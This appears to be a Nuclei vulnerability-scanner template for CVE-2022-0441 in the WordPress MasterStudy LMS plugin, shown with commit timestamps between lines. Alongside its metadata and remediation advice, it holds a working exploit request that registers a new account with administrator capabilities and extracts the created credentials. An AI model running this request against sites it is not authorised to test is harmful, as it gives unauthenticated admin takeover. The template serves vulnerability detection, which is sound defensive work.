2022-06-30 07:40:45 +00:00
id : CVE-2022-0441
info :
2023-04-06 19:11:27 +00:00
name : MasterStudy LMS <2.7.6 - Improper Access Control
2022-09-26 03:03:58 +00:00
author : dwisiswant0,theamanrawat
2022-06-30 07:40:45 +00:00
severity : critical
description : |
2023-04-06 19:11:27 +00:00
WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade to the latest version of the MasterStudy LMS plugin (2.7.6 or higher) to fix the improper access control issue.
2022-06-30 07:40:45 +00:00
reference :
- https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
2022-09-26 03:03:58 +00:00
- https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
2022-10-05 20:03:59 +00:00
- https://plugins.trac.wordpress.org/changeset/2667195
2023-04-06 19:11:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0441
2022-07-29 17:36:28 +00:00
classification :
2022-10-05 20:03:59 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-07-29 17:36:28 +00:00
cve-id : CVE-2022-0441
2022-10-05 20:03:59 +00:00
cwe-id : CWE-269
2023-10-14 11:27:55 +00:00
epss-score : 0.35682
2023-10-16 10:55:14 +00:00
epss-percentile : 0.96646
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:*
2022-09-26 03:03:58 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : stylemixthemes
product : masterstudy_lms
2023-09-06 11:59:08 +00:00
framework : wordpress
2022-09-26 03:03:58 +00:00
tags : cve,cve2022,wordpress,wp-plugin,wpscan,wp,unauth
2022-06-30 07:40:45 +00:00
variables :
username : "{{to_lower(rand_text_alphanumeric(6))}}"
2022-07-29 17:36:28 +00:00
password : "{{rand_text_alphanumeric(12)}}"
user_email : "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"
2023-04-27 04:28:59 +00:00
http :
2022-07-29 17:36:28 +00:00
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/json
2022-09-26 03:03:58 +00:00
{"user_login" : "{{username}}" , "user_email" : "{{user_email}}" , "user_password" : "{{password}}" , "user_password_re" : "{{password}}" , "become_instructor" : "" , "privacy_policy" : true , "degree" : "" , "expertize" : "" , "auditory" : "" , "additional" : [ ] , "additional_instructors" : [ ] , "profile_default_fields_for_register" : {"wp_capabilities" : {"value" : {"administrator" : 1 }}}}
2022-06-30 07:40:45 +00:00
2022-07-29 17:36:28 +00:00
req-condition : true
2023-07-11 19:49:27 +00:00
2022-09-26 03:03:58 +00:00
matchers-condition : and
2022-07-29 17:36:28 +00:00
matchers :
2022-06-30 07:47:14 +00:00
- type : word
2022-07-29 17:36:28 +00:00
part : body_2
2022-06-30 07:47:14 +00:00
words :
2022-07-29 17:36:28 +00:00
- 'Registration completed successfully'
- '"status":"success"'
2022-09-26 03:03:58 +00:00
condition : and
- type : word
part : header_2
words :
- application/json;
- type : status
status :
- 200
2023-07-11 19:49:27 +00:00
extractors :
- type : regex
name : nonce
group : 1
regex :
- '"stm_lms_register":"([0-9a-z]+)"'
internal : true
- type : kval
kval :
- user_email
- password